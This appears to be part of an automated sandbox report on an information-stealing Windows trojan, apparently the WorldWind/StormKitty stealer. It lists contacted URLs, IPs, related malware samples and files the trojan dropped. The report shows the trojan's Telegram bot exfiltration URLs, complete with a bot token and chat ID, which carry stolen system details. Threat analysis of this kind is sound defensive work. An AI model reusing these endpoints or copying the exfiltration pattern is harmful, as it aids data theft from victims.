0%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage	1%	Virustotal		Browse
https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders...	0%	Avira URL Cloud	safe
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://icanhazip.com/	0%	Avira URL Cloud	safe
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d	0%	Avira URL Cloud	safe
https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders...	1%	Virustotal		Browse
http://icanhazip.comd	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://icanhazip.com/	1%	Virustotal		Browse
http://icanhazip.com/t	0%	Avira URL Cloud	safe
https://api.mylnikov.org/geolocation/wifi?v=1.1&	0%	Avira URL Cloud	safe
https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=57954	0%	Avira URL Cloud	safe
https://github.com/LimerBoy/StormKitty	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	0%	Avira URL Cloud	safe
https://api.mylnikov.org	0%	Avira URL Cloud	safe
https://api.tele	0%	Avira URL Cloud	safe
https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=57954	1%	Virustotal		Browse
http://icanhazip.com/t	0%	Virustotal		Browse
https://api.mylnikov.org/geolocation/wifi?v=1.1&	0%	Virustotal		Browse
https://github.com/LimerBoy/StormKitty	2%	Virustotal		Browse
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=	1%	Virustotal		Browse
https://github.com/LimerBoy/StormKitty0&	0%	Avira URL Cloud	safe
https://api.telegram.orgd	0%	Avira URL Cloud	safe
http://api.telegram.orgd	0%	Avira URL Cloud	safe
https://api.mylnikov.org	3%	Virustotal		Browse
http://api.mylnikov.orgd	0%	Avira URL Cloud	safe
http://icanhazip.com	0%	Avira URL Cloud	safe
https://api.telegram.org/file/bot	0%	Avira URL Cloud	safe
http://api.telegram.org	0%	Avira URL Cloud	safe
https://github.com/LimerBoy/StormKitty0&	2%	Virustotal		Browse
https://api.telegram.org/file/bot	0%	Virustotal		Browse
https://github.com/LimerBoy/StormKittyTC	0%	Avira URL Cloud	safe
http://icanhazip.com	1%	Virustotal		Browse
https://pastebin.com/raw/7B75u64B	0%	Avira URL Cloud	safe
http://api.mylnikov.org	0%	Avira URL Cloud	safe
https://github.com/LimerBoy/StormKittyTC	2%	Virustotal		Browse
https://pastebin.com/raw/7B75u64B	3%	Virustotal		Browse
http://api.mylnikov.org	3%	Virustotal		Browse
http://api.telegram.org	2%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.mylnikov.org	172.67.196.114	true	false	3%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown
icanhazip.com	104.16.185.241	true	false	1%, Virustotal, Browse	unknown
55.235.10.0.in-addr.arpa	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20WorldWind%20Pro%20-%20Results:%0ADate:%202024-08-04%208:57:31%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20715575%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20Hardware:%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20U2FFA%0ARAM:%204095MB%0AHWID:%208E348CD443%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20Network:%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20Domains%20info:%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20Bank%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20Crypto%20Logs%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20Freaky%20Logs%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20Logs:%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20Software:%0A%0A%20%20%F0%9F%A7%AD%20Device:%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20File%20Grabber:%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders...	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://icanhazip.com/	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13	eEo6DAcnnx.exe	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org	eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000311F000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.00000000030BA000.00000004.00000800.00020000.00000000.sdmp	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	eEo6DAcnnx.exe	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage	eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000311F000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000309F000.00000004.00000800.00020000.00000000.sdmp	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=	eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000301A000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d	eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000301A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	false	URL Reputation: safe	unknown
http://icanhazip.comd	eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000301A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	tmpCF7E.tmp.dat.0.dr	false	URL Reputation: safe	unknown
http://icanhazip.com/t	eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002F09000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&	eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000301A000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot6082381502:AAGYF_HaZVw7ziBPxYHyd8WNo0uQbAM7fiU/sendMessage?chat_id=57954	eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000311F000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000309F000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.00000000030BA000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.00000000030B4000.00000004.00000800.00020000.00000000.sdmp	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/LimerBoy/StormKitty	eEo6DAcnnx.exe	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	tmpCF7E.tmp.dat.0.dr	false	Avira URL Cloud: safe	unknown
https://api.tele	eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002F09000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://api.mylnikov.org	eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000301A000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/LimerBoy/StormKitty0&	eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002C61000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.orgd	eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000311F000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000309F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://api.telegram.orgd	eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000311F000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.00000000030BA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://icanhazip.com	eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002F09000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.mozilla.org	tmpCF7E.tmp.dat.0.dr	false	URL Reputation: safe	unknown
http://api.mylnikov.orgd	eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000003081000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/file/bot	eEo6DAcnnx.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://api.telegram.org	eEo6DAcnnx.exe, 00000000.00000002.4766888290.000000000311F000.00000004.00000800.00020000.00000000.sdmp, eEo6DAcnnx.exe, 00000000.00000002.4766888290.00000000030BA000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/LimerBoy/StormKittyTC	eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002F09000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000002F09000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://api.mylnikov.org	eEo6DAcnnx.exe, 00000000.00000002.4766888290.0000000003081000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmpCE8E.tmp.dat.0.dr, tmpCE5B.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://pastebin.com/raw/7B75u64B	eEo6DAcnnx.exe	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
172.67.196.114	api.mylnikov.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1487531
Start date and time:	2024-08-04 14:56:16 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	eEo6DAcnnx.exe renamed because original name is a hash value
Original Sample Name:	720b2d599314eaf90cd60038f7e7d2e8.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@17/88@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 119 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:57:40	API Interceptor	11083429x Sleep call for process: eEo6DAcnnx.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	3.bin.exe	Get hash	malicious	Go Injector	Browse
	raw.ps1	Get hash	malicious	Unknown	Browse
	#U202f#U202f#U2005#U00a0.scr.exe	Get hash	malicious	Blank Grabber	Browse
	ShadowCrypter.exe	Get hash	malicious	Clipboard Hijacker, XWorm	Browse
	GhostBinder-FUD.exe	Get hash	malicious	XWorm	Browse
	msedge.exe	Get hash	malicious	XWorm	Browse
	rPI209087.exe	Get hash	malicious	AgentTesla	Browse
	SolaraModified.exe	Get hash	malicious	XWorm	Browse
	aznuril.exe	Get hash	malicious	XWorm	Browse
	setup.exe	Get hash	malicious	XWorm	Browse
104.16.185.241	5oci4lcontract.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	icanhazip.com/
	viVOqZjAT0.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	icanhazip.com/
	down.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	icanhazip.com/
	7Y18r(198).exe	Get hash	malicious	Upatre	Browse	icanhazip.com/
	LisectAVT_2403002B_340.exe	Get hash	malicious	Bdaejec, Upatre	Browse	icanhazip.com/
	LisectAVT_2403002B_4.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse	icanhazip.com/
	7Y18r(114).exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	7Y18r(114).exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	CdB3FZ9vyI.exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	ZUlr0Vm0Zt.pdf	Get hash	malicious	Hatef Wiper	Browse	icanhazip.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.mylnikov.org	83MZfLKh7D.exe	Get hash	malicious	AsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLine	Browse	104.21.44.66
	viVOqZjAT0.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	LisectAVT_2403002B_4.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	2U1S7Ab7YU.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse	172.67.196.114
	Kh7W85ONS7.exe	Get hash	malicious	AsyncRAT, DarkTortilla, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	zrrHgsDzgS.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRAT	Browse	104.21.44.66
	H1XdsfkcgU.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	w5APKwp5DD.exe	Get hash	malicious	AsyncRAT, HTMLPhisher, MicroClip, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	172.67.196.114
api.telegram.org	3.bin.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220
	raw.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	#U202f#U202f#U2005#U00a0.scr.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	ShadowCrypter.exe	Get hash	malicious	Clipboard Hijacker, XWorm	Browse	149.154.167.220
	GhostBinder-FUD.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	msedge.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	rPI209087.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SolaraModified.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	aznuril.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	setup.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
icanhazip.com	83MZfLKh7D.exe	Get hash	malicious	AsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLine	Browse	104.16.184.241
	5oci4lcontract.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	104.16.185.241
	Inquiry.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	104.16.184.241
	viVOqZjAT0.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.185.241
	down.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	104.16.185.241
	7Y18r(198).exe	Get hash	malicious	Upatre	Browse	104.16.185.241
	LisectAVT_2403002B_340.exe	Get hash	malicious	Bdaejec, Upatre	Browse	104.16.185.241
	LisectAVT_2403002B_4.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse	104.16.185.241
	7Y18r(114).exe	Get hash	malicious	Unknown	Browse	104.16.185.241
	7Y18r(114).exe	Get hash	malicious	Unknown	Browse	104.16.185.241

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	3.bin.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220
	raw.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220
	#U202f#U202f#U2005#U00a0.scr.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	https://loker-pt-freeport-indonesia-2024.digitall-co.web.id/	Get hash	malicious	Unknown	Browse	149.154.167.99
	ShadowCrypter.exe	Get hash	malicious	Clipboard Hijacker, XWorm	Browse	149.154.167.220
	GhostBinder-FUD.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	msedge.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	woklsbEMwW.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://creativeservices.netflix.com.sg-vnt-2.sosis-berurat.live/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://creativeservices.netflix.com.sg-vnt-1.sosis-berurat.live/	Get hash	malicious	Unknown	Browse	149.154.167.99
CLOUDFLARENETUS	Urq5Bp4bgs.elf	Get hash	malicious	Unknown	Browse	1.15.163.159
	Setup.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	188.114.97.3
	vercath63.b-cdn.ps1	Get hash	malicious	LummaC, Go Injector	Browse	172.67.175.230
	Setup.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	188.114.96.3
	Bank slip.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	2.bin.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	188.114.96.3
	SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6404.9577.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Client-built.bin.exe	Get hash	malicious	Discord Rat	Browse	162.159.130.234
	Client-built.bin.exe	Get hash	malicious	Discord Rat	Browse	162.159.133.234
	v9.exe	Get hash	malicious	Unknown	Browse	172.67.192.2
CLOUDFLARENETUS	Urq5Bp4bgs.elf	Get hash	malicious	Unknown	Browse	1.15.163.159
	Setup.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	188.114.97.3
	vercath63.b-cdn.ps1	Get hash	malicious	LummaC, Go Injector	Browse	172.67.175.230
	Setup.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	188.114.96.3
	Bank slip.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	2.bin.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	188.114.96.3
	SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6404.9577.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Client-built.bin.exe	Get hash	malicious	Discord Rat	Browse	162.159.130.234
	Client-built.bin.exe	Get hash	malicious	Discord Rat	Browse	162.159.133.234
	v9.exe	Get hash	malicious	Unknown	Browse	172.67.192.2

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	vercath63.b-cdn.ps1	Get hash	malicious	LummaC, Go Injector	Browse	149.154.167.220 172.67.196.114
	Guidelines_for_Citizen_Safety.msi	Get hash	malicious	AteraAgent	Browse	149.154.167.220 172.67.196.114
	3.bin.exe	Get hash	malicious	Go Injector	Browse	149.154.167.220 172.67.196.114
	raw.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.196.114
	SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.6404.9577.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 172.67.196.114
	Client-built.bin.exe	Get hash	malicious	Discord Rat	Browse	149.154.167.220 172.67.196.114
	Client-built.bin.exe	Get hash	malicious	Discord Rat	Browse	149.154.167.220 172.67.196.114
	SecuriteInfo.com.Program.Unwanted.5011.11652.31740.exe	Get hash	malicious	PureLog Stealer	Browse	149.154.167.220 172.67.196.114
	2.exe	Get hash	malicious	Phisher	Browse	149.154.167.220 172.67.196.114
	SecuriteInfo.com.Program.Unwanted.5011.11652.31740.exe	Get hash	malicious	PureLog Stealer	Browse	149.154.167.220 172.67.196.114

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	very short file (no magic)
Category:	modified
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Browsers\Firefox\Bookmarks.txt

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Directories\Desktop.txt

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	565
Entropy (8bit):	5.225556840167575
Encrypted:	false
SSDEEP:	12:wvB/q/ZpiPgbai5isYcsKcNoSVeLKlJr/6SPd4sgSHIb:gy/Lai5ebZ7lJr/BPdhgSHIb
MD5:	3E5B12F3A4674C41A21F0EA564DC340C
SHA1:	4CA671EF7C9DA5F781CDF207236E6BA2C7396282
SHA-256:	F48A5B43643CF15F9DA2C9135AE2346C8A04A8FCA987235A4FEF9EE6ECD4BE0E
SHA-512:	8E2793F8EBA004824B56D30105CCD93914B057598DE7F50E4333A5AD752231871832C048D9F7B774BCAEA136448B3F5D2EF2C20F26D28A5AD2D7C58BF633AED0
Malicious:	false
Preview:	Desktop\...EOWRVPQCCS\....EIVQSAOTAQ.pdf....EOWRVPQCCS.docx....EWZCVGNOWT.jpg....GIGIYTFFYT.png....KLIZUSIQEN.mp3....ZGGKNSUKOP.xlsx...GLTYDMDUST\...JDDHMPCDUJ\...LFOPODGVOH\...TQDFJHPUIU\...ZGGKNSUKOP\....EWZCVGNOWT.xlsx....JDDHMPCDUJ.jpg....KLIZUSIQEN.pdf....NWCXBPIUYI.mp3....NYMMPCEIMA.png....ZGGKNSUKOP.docx...desktop.ini...eEo6DAcnnx.exe...EIVQSAOTAQ.pdf...EOWRVPQCCS.docx...EWZCVGNOWT.jpg...EWZCVGNOWT.xlsx...Excel.lnk...GIGIYTFFYT.png...JDDHMPCDUJ.jpg...KLIZUSIQEN.mp3...KLIZUSIQEN.pdf...NWCXBPIUYI.mp3...NYMMPCEIMA.png...ZGGKNSUKOP.docx...ZGGKNSUKOP.xlsx..

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Directories\Documents.txt

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	690
Entropy (8bit):	5.344491584649192
Encrypted:	false
SSDEEP:	12:gq/ZpiPggPLKQ4wRLKTLKBLKMkLKsi5isYcsKcNoSVeLK4r/6S4sgSHIb:f/VxrqEEsi5ebZ74r/nhgSHIb
